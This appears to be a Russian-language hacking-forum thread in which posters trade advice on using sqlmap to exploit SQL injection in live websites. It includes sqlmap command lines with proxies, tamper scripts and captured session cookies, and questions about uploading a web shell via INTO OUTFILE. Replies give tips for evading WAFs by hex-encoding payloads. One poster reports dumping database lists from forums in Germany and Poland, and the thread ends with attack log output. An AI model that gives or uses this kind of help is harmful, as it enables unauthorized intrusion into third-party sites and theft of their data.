Буду признателен, если кто то нормально объяснить как правильно подбирать тамперы. Или ссылку на понятный мануал по этой теме
Есть скуля, но она в одном фреймворке, который триггерует на слэш " / " , (фреймворк, потому как на другом сайте такая же ситуация). Я в курсе, что слэш никак не мешает доставать полезную информацию, это сделано, но есть теоретическая возможность залития шелла (file priv Y, пути есть),а скулмап его не в состоянии залить, указывать пути не могу по причине того, что не работает слеш ( INTO OUTFILE "путь/до/шелла" ). Что посоветуете ?
Поставить sqlmap, скорость упала, как сохранить данные которые уже скачались из базы? Если просто окно закрыть, вроде как данные все пропадут...
Type cast - приведение типов. sqlmap по умолчанию использует приведение типов данных к строковым значениям для удобного отображения результата в консоли. Но не всегда этот механизм необходим, в некоторых случаях данные не будут корректно приведены к строковому типу. Для наглядности работы механизма можно рассмотреть запросы к MySQL, которые генерирует sqlmap: a) без параметра --no-cast б) с параметром --no-cast
Не получается раскрутить уязвимость(это же уязвимость?) Ошибка: https://s8.hostingkartinok.com/uploads/images/2017/07/80ef9de7524d6b4140aa13115e042fec.png POST такой: Spoiler Заголовки: Code: Host: site.ru User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: site.ru/page Cookie: __cfduid=d6db872199804f625c490305153453b1b1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423 Connection: keep-alive Upgrade-Insecure-Requests: 1 Тело: Code: Content-Type: multipart/form-data; boundary=---------------------------29948882417335 Content-Length: 249 -----------------------------29948882417335 Content-Disposition: form-data; name="email" ' -----------------------------29948882417335 Content-Disposition: form-data; name="password" 00000000 -----------------------------29948882417335-- Пытаюсь вот так, я наверное неправильно --data оформляю Code: sqlmap.py -u "site.ru/page" --proxy-file="proxy.txt" --random-agent --time-sec=10 --delay=1 --tamper="between,randomcase,space2comment" --dbms=mysql --level=5 --risk=1 -v3 --data="???"
-u "site.ru/page" --proxy-file="proxy.txt" --random-agent --tamper="between,randomcase,space2comment" --cookie="__cfduid=d6db872199804f625c490305153453b1b1499733704; PHPSESSID=0881abe8mvn1a6uov3sod7mps6; language=ru; currency=RUB; gameboxmp2.net=true; viewed=423" -v 3 --data "password=123&email=123" -p email --dbs
Нашел сейчас при помощи sqlmap дыры на паре форумов в Германии и Польше . Один вроде даже довольно крупный . На первом форуме успеваю слить список бд . Потом сервер отключается . Ошибка 502 bad gateway с любого ip . На втором time-based blind . Полчаса и тот же резалт . Собственно wtf ? Никогда с таким не сталкивался ранее . Это типа новая защита или sqlmap в 8 потоков роняет теперь маршрутизаторы ?
time-based да еще и слепой может быть обычным лагом из-за твоего пинга а первый может WAF спалил, пробуй разные техники обхода WAF, заHEXи инъекцию как вариант но если WAF уже сработал то высока вероятность что об этом админ тоже узнал и дырки уже нет
Привет. Подскажите плиз как в python скрипт интегрировать sqlmap? Через pip sqlmap установил, а что дальше делать непонятно. Не могу понять как задать какие-либо параметры. P.S. Как работать напрямую с sqlmap я знаю. Мне нужно его именно добавить в скрипт
хз, не проверял, таблицы для брута если правильно понимаю тут sqlmap/txt/common-tables.txt можешь так сделать Code: ~/sqlmap/txt$ mv common-tables.txt common-tables.txt-old ~/sqlmap/txt$ cat common-tables.txt-old | grep -vE '^#' | perl -lane 'if($_=~s/(.*)/YOUPREF_$1/){print $_}' > common-tables.txt
[12:01:59] [INFO] URI parameter '#1*' appears to be 'PostgreSQL > 8.1 AND time-b ased blind' injectable for the remaining tests, do you want to include all tests for 'PostgreSQL' exten ding provided level (3) value? [Y/n] y [12:02:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:02:05] [INFO] automatically extending ranges for UNION query injection techn ique tests as there is at least one other (potential) technique found [12:02:38] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns ' [12:02:41] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extendi ng the range for current UNION query injection technique test [12:02:47] [INFO] target URL appears to have 4 columns in query [12:03:12] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns' [12:03:50] [INFO] testing 'Generic UNION query (random number) - 21 to 40 column s' [12:04:20] [INFO] target URL appears to be UNION injectable with 40 columns [12:05:27] [CRITICAL] unable to connect to the target URL ('╧юя√Єър єёЄрэютшЄ№ ё юхфшэхэшх с√ыр схчєёях°эющ, Є.ъ. юЄ фЁєуюую ъюья№■ЄхЁр чр ЄЁхсєхьюх тЁхь эх яюы єўхэ эєцэ√щ юЄъышъ, шыш с√ыю ЁрчюЁтрэю єцх єёЄрэютыхээюх ёюхфшэхэшх шч-'). sqlma p is going to retry the request(s) [12:05:27] [WARNING] if the problem persists please try to lower the number of u sed threads (option '--threads') [12:08:49] [INFO] testing 'Generic UNION query (NULL) - 41 to 60 columns' [12:09:28] [INFO] checking if the injection point on URI parameter '#1*' is a fa lse positive Такое впечатление что не докручивает,подскажите как еще можно попробовать реализовать атаку?Скуля вида ?id=123